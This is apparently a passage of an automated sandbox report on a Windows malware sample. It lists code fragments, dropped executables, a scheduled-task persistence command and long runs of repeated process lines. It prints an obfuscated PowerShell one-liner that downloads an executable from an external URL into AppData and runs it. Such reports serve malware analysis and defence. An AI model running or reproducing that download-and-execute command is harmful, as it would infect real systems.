          Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E6C16 push ecx; ret
          Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_009817AF pushad ; iretd
          Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_00682156 push ecx; ret
          Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_006B08FC push eax; ret
          Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_006B099C push ecx; ret
          Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_0068118E push ecx; ret
          Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_0042BBAE push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_000B650A push ecx; retf
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_000B60CC pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_000B4AD5 push edx; retf
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_0048780D push ebx; retf
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00482B7A pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_01F6AC61 push ebx; iretd
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 34_2_000B650A push ecx; retf
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 34_2_000B60CC pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 34_2_000B4AD5 push edx; retf
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_0023650A push ecx; retf
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_002360CC pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_00234AD5 push edx; retf
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A780D push ebx; retf
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_001A2B7A pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 37_2_003EAC61 push ebx; iretd
          Source: initial sample | Static PE information: section name: .text entropy: 7.53751279368

          Persistence and Installation Behavior:

          Tries to download and execute files (via powershell)
          Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
          Source: C:\Users\user\AppData\Roaming\sp.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe
          Source: C:\Users\user\AppData\Roaming\sp.exe | File created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\sp.exe
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | File created: C:\Users\user\AppData\Roaming\JrekdQ.exe
          Source: C:\Users\user\AppData\Roaming\sp.exe | File created: C:\Users\user\AppData\Roaming\gUuYfpYBjYgU.exe
          Source: C:\Users\user\AppData\Roaming\sp.exe | File created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
          Source: C:\Users\user\AppData\Roaming\sp.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'

          Hooking and other Techniques for Hiding and Protection:

          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | File opened: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe:Zone.Identifier read attributes | delete
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
